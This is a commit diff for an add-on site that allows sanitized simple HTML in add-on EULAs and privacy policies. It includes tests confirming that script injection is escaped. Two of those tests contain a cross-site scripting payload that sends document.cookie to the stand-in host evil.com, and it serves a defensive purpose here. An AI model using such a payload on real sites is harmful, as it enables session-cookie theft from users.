bug 604222: allow simple HTML in Add-on EULA and privacy policy

jbalogh · Nov 1, 2010 · 60f2283 · 60f2283
1 parent c2dcbbc
commit 60f2283
Show file tree

Hide file tree

Showing 5 changed files with 113 additions and 5 deletions.
diff --git a/apps/addons/models.py b/apps/addons/models.py
@@ -120,8 +120,8 @@ class Addon(amo.models.ModelBase):
 
     summary = LinkifiedField()
     developer_comments = PurifiedField(db_column='developercomments')
-    eula = TranslatedField()
-    privacy_policy = TranslatedField(db_column='privacypolicy')
+    eula = PurifiedField()
+    privacy_policy = PurifiedField(db_column='privacypolicy')
     the_reason = TranslatedField()
     the_future = TranslatedField()
 

diff --git a/apps/addons/templates/addons/eula.html b/apps/addons/templates/addons/eula.html
@@ -31,7 +31,7 @@ <h3>{{ _('End-User License Agreement') }}</h3>
     {% endtrans %}
   </p>
 </div>
-<textarea class="policy-statement" readonly="readonly" cols="80" rows="20">{{ addon.eula }}</textarea>
+<div class="policy-statement">{{ addon.eula }}</div>
 {{ install_button(addon, version=version, show_contrib=False,
                   show_eula=False, show_warning=False) }}
 <p class="policy-link">

diff --git a/apps/addons/templates/addons/privacy.html b/apps/addons/templates/addons/privacy.html
@@ -25,7 +25,7 @@ <h2 class="name"{{ addon.name|locale_html }}>
   </h2>
 </header>
 <h3>{{ _('Privacy Policy') }}</h3>
-<textarea class="policy-statement" readonly="readonly" cols="80" rows="20">{{ addon.privacy_policy }}</textarea>
+<div class="policy-statement">{{ addon.privacy_policy }}</div>
 <p class="policy-link">
   <a href ="{{ url('addons.detail', addon.id) }}">
     {{ _('Back to {0}...')|f(addon.name) }}

diff --git a/apps/addons/tests/test_views.py b/apps/addons/tests/test_views.py
@@ -8,7 +8,7 @@
 from django.utils import translation
 from django.utils.encoding import iri_to_uri
 
-from nose.tools import eq_
+from nose.tools import eq_, set_trace
 import test_utils
 from pyquery import PyQuery as pq
 
@@ -23,6 +23,10 @@
 from translations.query import order_by_translation
 
 
+def norm(s):
+    """Normalize a string so that whitespace is uniform."""
+    return re.sub(r'[\s]+', ' ', str(s)).strip()
+
 class TestHomepage(test_utils.TestCase):
     fixtures = ['base/apps',
                 'base/users',
@@ -496,6 +500,55 @@ def test_privacy_policy(self):
         privacy_url = reverse('addons.privacy', args=[addon.id])
         assert doc('.privacy-policy').attr('href').endswith(privacy_url)
 
+    def test_simple_html_is_rendered_in_privacy(self):
+        addon = Addon.objects.get(id=3615)
+        addon.privacy_policy = """
+            <strong> what the hell..</strong>
+            <ul>
+                <li>papparapara</li>
+                <li>todotodotodo</li>
+            </ul>
+            <ol>
+                <a href="irc://irc.mozilla.org/firefox">firefox</a>
+
+                Introduce yourself to the community, if you like!
+                This text will appear publicly on your user info page.
+                <li>papparapara2</li>
+                <li>todotodotodo2</li>
+            </ol>
+            """
+        addon.save()
+
+        r = self.client.get(reverse('addons.privacy', args=[addon.id]))
+        doc = pq(r.content)
+
+        eq_(norm(doc(".policy-statement strong")),
+            "<strong> what the hell..</strong>")
+        eq_(norm(doc(".policy-statement ul")),
+            "<ul><li>papparapara</li> <li>todotodotodo</li> </ul>")
+        eq_(doc(".policy-statement ol a").text(),
+            "firefox")
+        eq_(norm(doc(".policy-statement ol li:first")),
+            "<li>papparapara2</li>")
+
+    def test_evil_html_is_not_rendered_in_privacy(self):
+        addon = Addon.objects.get(id=3615)
+        addon.privacy_policy = """
+            <script type="text/javascript">
+                window.location = 'http://evil.com/?c=' + document.cookie;
+            </script>
+            Muhuhahahahahahaha!
+            """
+        addon.save()
+
+        r = self.client.get(reverse('addons.privacy', args=[addon.id]))
+        doc = pq(r.content)
+
+        policy = str(doc(".policy-statement"))
+        assert policy.startswith(
+                    '<div class="policy-statement">&lt;script'), (
+                                            'Unexpected: %s' % policy[0:50])
+
     def test_button_size(self):
         """Make sure install buttons on the detail page are prominent."""
         response = self.client.get(reverse('addons.detail', args=[3615]),
@@ -632,6 +685,55 @@ def test_current_version(self):
         r = self.client.get(reverse('addons.eula', args=[addon.id]))
         eq_(r.context['version'], addon.current_version)
 
+    def test_simple_html_is_rendered(self):
+        addon = Addon.objects.get(id=11730)
+        addon.eula = """
+            <strong> what the hell..</strong>
+            <ul>
+                <li>papparapara</li>
+                <li>todotodotodo</li>
+            </ul>
+            <ol>
+                <a href="irc://irc.mozilla.org/firefox">firefox</a>
+
+                Introduce yourself to the community, if you like!
+                This text will appear publicly on your user info page.
+                <li>papparapara2</li>
+                <li>todotodotodo2</li>
+            </ol>
+            """
+        addon.save()
+
+        r = self.client.get(reverse('addons.eula', args=[addon.id]))
+        doc = pq(r.content)
+
+        eq_(norm(doc(".policy-statement strong")),
+            "<strong> what the hell..</strong>")
+        eq_(norm(doc(".policy-statement ul")),
+            "<ul><li>papparapara</li> <li>todotodotodo</li> </ul>")
+        eq_(doc(".policy-statement ol a").text(),
+            "firefox")
+        eq_(norm(doc(".policy-statement ol li:first")),
+            "<li>papparapara2</li>")
+
+    def test_evil_html_is_not_rendered(self):
+        addon = Addon.objects.get(id=11730)
+        addon.eula = """
+            <script type="text/javascript">
+                window.location = 'http://evil.com/?c=' + document.cookie;
+            </script>
+            Muhuhahahahahahaha!
+            """
+        addon.save()
+
+        r = self.client.get(reverse('addons.eula', args=[addon.id]))
+        doc = pq(r.content)
+
+        policy = str(doc(".policy-statement"))
+        assert policy.startswith(
+                    '<div class="policy-statement">&lt;script'), (
+                                            'Unexpected: %s' % policy[0:50])
+
     def test_old_version(self):
         addon = Addon.objects.get(id=11730)
         old = addon.versions.order_by('created')[0]

diff --git a/media/css/main.css b/media/css/main.css
@@ -942,6 +942,12 @@ form.favorite {
 }
 .policy-statement {
     margin-bottom: 1em;
+    max-height: 300px;
+    overflow: auto;
+    padding:2px 5px;
+    background-color: #fff;
+    border: 1px solid #5875A0;
+    color:#666666;
 }
 
 .prose {